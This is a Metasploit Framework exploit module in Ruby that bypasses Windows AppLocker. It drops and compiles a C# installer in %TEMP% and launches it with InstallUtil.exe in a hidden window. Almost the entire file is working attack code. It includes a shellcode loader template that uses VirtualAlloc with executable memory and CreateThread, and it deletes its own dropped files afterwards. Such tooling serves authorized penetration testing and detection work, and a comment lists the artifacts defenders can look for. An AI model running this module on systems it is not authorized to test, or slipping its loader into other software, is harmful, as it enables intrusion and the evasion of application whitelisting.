GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/local/applocker_bypass.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  # FileDropper gives register_files_for_cleanup; Post::File gives
  # write_file / dir / directory? / file? / get_envs / cmd_exec.
  include Msf::Exploit::FileDropper
  include Msf::Post::File

  # Builds the module metadata through update_info and passes it to the
  # Local exploit superclass. Declares the one Meterpreter command the
  # module depends on (stdapi_sys_process_execute, used in
  # execute_installutil).
  #
  # @param info [Hash] metadata supplied by the framework; merged by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'AppLocker Execution Prevention Bypass',
        'Description' => %q{
          This module will generate a .NET service executable on the target and utilize
          InstallUtil to run the payload bypassing the AppLocker protection.

          Currently only the InstallUtil method is provided, but future methods can be
          added easily.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Casey Smith', # Original AppLocker bypass research
          'OJ Reeves' # MSF module
        ],
        'Platform' => [ 'win' ],
        'Arch' => [ ARCH_X86, ARCH_X64 ],
        'SessionTypes' => [ 'meterpreter' ],
        'Targets' => [ [ 'Windows', {} ] ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2015-08-03',
        'References' => [
          ['URL', 'https://gist.github.com/subTee/fac6af078937dda81e57']
        ],
        'Compat' => {
          'Meterpreter' => {
            'Commands' => %w[
              stdapi_sys_process_execute
            ]
          }
        }
      )
    )
  end

  # Run Method for when run command is issued.
  #
  # Refuses to continue (Failure::NoTarget) when an x64 payload was chosen
  # but sysinfo['Architecture'] does not mention 64, then delegates to the
  # only technique currently implemented, execute_installutil.
  #
  # @raise [Msf::Exploit::Failed] via fail_with on an architecture mismatch
  def exploit
    if payload.arch.first == ARCH_X64 && sysinfo['Architecture'] !~ /64/
      fail_with(Failure::NoTarget, 'The target platform is x86. 64-bit payloads are not supported.')
    end

    # sysinfo is only on meterpreter sessions
    print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil?

    execute_installutil
  end

  # InstallUtil technique: writes a generated C# source file to %TEMP%,
  # compiles it with the framework's csc.exe, and launches InstallUtil.exe
  # on the result. Both dropped files are registered for cleanup.
  #
  # Defensive note: the observable artifacts of this technique are exactly
  # the steps below — a randomly named .cs/.exe pair in %TEMP%, a csc.exe
  # invocation with /target:winexe, and InstallUtil.exe run with
  # /LogToConsole=false and /U.
  #
  # @return [void]
  def execute_installutil
    # Both values are read from the session's environment, not hard-coded.
    envs = get_envs('TEMP', 'windir')

    # Fails the module (NotVulnerable) if no usable framework dir is found.
    dotnet_path = get_dotnet_path(envs['windir'])
    print_status("Using .NET path #{dotnet_path}")

    # Eight random alphabetic characters for each dropped file name.
    cs_path = "#{envs['TEMP']}\\#{Rex::Text.rand_text_alpha(8)}.cs"
    exe_path = "#{envs['TEMP']}\\#{Rex::Text.rand_text_alpha(8)}.exe"

    installutil_path = "#{dotnet_path}\\InstallUtil.exe"

    print_status("Writing payload to #{cs_path}")
    write_file(cs_path, generate_csharp_source)
    register_files_for_cleanup(cs_path)

    print_status("Compiling payload to #{exe_path}")
    csc_path = "#{dotnet_path}\\csc.exe"
    # ARCH_X86 / ARCH_X64 double as the csc /platform: values here.
    csc_platform = payload.arch.first == ARCH_X86 ? ARCH_X86 : ARCH_X64
    vprint_status("Executing: #{csc_path} /target:winexe /nologo /platform:#{csc_platform} /w:0 /out:#{exe_path} #{cs_path}")
    cmd_exec(csc_path, "/target:winexe /nologo /platform:#{csc_platform} /w:0 /out:#{exe_path} #{cs_path}")

    print_status("Executing payload ...")
    vprint_status("Executing: #{installutil_path} /logfile= /LogToConsole=false /U #{exe_path}")
    # Hidden => true: the InstallUtil window is not shown on the target.
    client.sys.process.execute(installutil_path, "/logfile= /LogToConsole=false /U #{exe_path}", { 'Hidden' => true })
    # Registered after execution so the cleanup does not race the launch.
    register_files_for_cleanup(exe_path)
  end

  # Locates a .NET Framework version directory that contains InstallUtil.exe.
  #
  # Looks under Microsoft.NET\Framework for x86 payloads and
  # Microsoft.NET\Framework64 otherwise, keeps only entries whose name starts
  # with 'v', and walks them in reverse listing order, presumably so that the
  # highest-numbered version is tried first (this relies on dir() returning
  # names in ascending order — TODO confirm).
  #
  # @param windir [String] value of the target's windir environment variable
  # @return [String] full path of the first matching framework directory
  # @raise [Msf::Exploit::Failed] via fail_with(Failure::NotVulnerable) when
  #   no candidate directory holds InstallUtil.exe
  def get_dotnet_path(windir)
    base_path = "#{windir}\\Microsoft.NET\\Framework#{payload.arch.first == ARCH_X86 ? '' : '64'}"
    paths = dir(base_path).select { |p| p[0] == 'v' }
    dotnet_path = nil

    paths.reverse.each do |p|
      path = "#{base_path}\\#{p}"
      # Both checks are remote (Post::File); a version dir without
      # InstallUtil.exe is skipped rather than failing outright.
      if directory?(path) && file?("#{path}\\InstallUtil.exe")
        dotnet_path = path
        break
      end
    end

    unless dotnet_path
      fail_with(Failure::NotVulnerable, '.NET is not present on the target.')
    end

    dotnet_path
  end

  # Renders the C# source that execute_installutil compiles.
  #
  # The encoded payload is emitted as a comma-separated list of 0x.. byte
  # literals and interpolated into a template whose Installer subclass is
  # marked RunInstaller(true). Because InstallUtil is invoked with /U, the
  # payload lives in the Uninstall override; Program.Main is intentionally
  # empty. The template text is part of what is written to the target and
  # must be kept verbatim.
  #
  # @return [String] complete C# source for the installer executable
  def generate_csharp_source
    # Each byte becomes "0x<hex>" (no zero padding); joined with commas.
    sc = payload.encoded.each_byte.map { |b| "0x#{b.to_s(16)}" }.join(',')
    cs = %Q^
    using System;

    namespace Pop
    {
      public class Program { public static void Main() { } }

      [System.ComponentModel.RunInstaller(true)]
      public class Pop : System.Configuration.Install.Installer
      {
        private static Int32 MEM_COMMIT=0x1000;
        private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40;
        private static UInt32 INFINITE = 0xFFFFFFFF;

        [System.Runtime.InteropServices.DllImport("kernel32")]
        private static extern IntPtr VirtualAlloc(IntPtr a, UIntPtr s, Int32 t, IntPtr p);

        [System.Runtime.InteropServices.DllImport("kernel32")]
        private static extern IntPtr CreateThread(IntPtr att, UIntPtr st, IntPtr sa, IntPtr p, Int32 c, ref IntPtr id);

        [System.Runtime.InteropServices.DllImport("kernel32")]
        private static extern UInt32 WaitForSingleObject(IntPtr h, UInt32 ms);

        public override void Uninstall(System.Collections.IDictionary s)
        {
          byte[] sc = new byte[] {#{sc}};
          IntPtr m = VirtualAlloc(IntPtr.Zero, (UIntPtr)sc.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
          System.Runtime.InteropServices.Marshal.Copy(sc, 0, m, sc.Length);
          IntPtr id = IntPtr.Zero;
          WaitForSingleObject(CreateThread(id, UIntPtr.Zero, m, id, 0, ref id), INFINITE);
        }
      }
    }
    ^

    cs
  end
end